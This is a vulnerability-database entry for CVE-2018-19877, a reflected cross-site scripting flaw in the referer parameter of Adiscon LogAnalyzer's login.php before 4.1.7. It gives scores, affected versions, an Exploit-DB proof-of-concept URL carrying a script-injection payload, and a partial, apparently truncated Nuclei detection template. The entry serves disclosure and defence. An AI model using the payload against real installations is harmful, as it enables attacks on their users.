CVE-2018-19877
Published 2018-12-05
Priority: P3 · 46 · medium · 6.1 (CVSS 3.0)
CVSS 3.0 vector: AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
Exploit: available (see the Exploit-DB entry below)
EPSS: 18.56% (96.9th percentile)
login.php in Adiscon LogAnalyzer before 4.1.7 has XSS via the Login Button Referer field.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adiscon | loganalyzer | < 4.1.7 | 4.1.7 |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 6.1 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
| osv | – | 6.1 | MEDIUM | – |
GHSA
GHSA-5jc5-95gm-6p5f: login (ghsa_unreviewed · 2022-05-14 · MEDIUM · CWE-79)
login.php in Adiscon LogAnalyzer before 4.1.7 has XSS via the Login Button Referer field.
OSV
CVE-2018-19877: login (osv · 2018-12-05 · CVSS 6.1 · MEDIUM)
login.php in Adiscon LogAnalyzer before 4.1.7 has XSS via the Login Button Referer field.
No detection rules found.
Exploit-DB
Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting (exploitdb · 2018-12-09 · CVSS 6.1 · MEDIUM)
```text
# Adiscon LogAnalyzer https://github.com/rsyslog/loganalyzer
# Exploit Author: Gustavo Sorondo
# Contact: http://twitter.com/iampuky
# Website: http://cintainfinita.com/
# CVE: CVE-2018-19877
# Category: webapps

# 1. Description
# Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS)
# in the 'referer' parameter of the login.php file.

# 2. Proof of Concept
http://my.loganalyzer.instance/login.php?referer=%22%3E%3Cscript%3Ealert('Cinta%20Infinita')%3C/script%3E

# 3. Solution:
# Update to version 4.1.7.
# https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
```
Nuclei
Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting (nuclei · CVSS 6.1 · MEDIUM)
Adiscon LogAnalyzer confirm(document.domain)'
```yaml
- type: word
  part: header
  words:
    - text/html
- type: status
  status:
    - 200
```
No writeups or analysis indexed.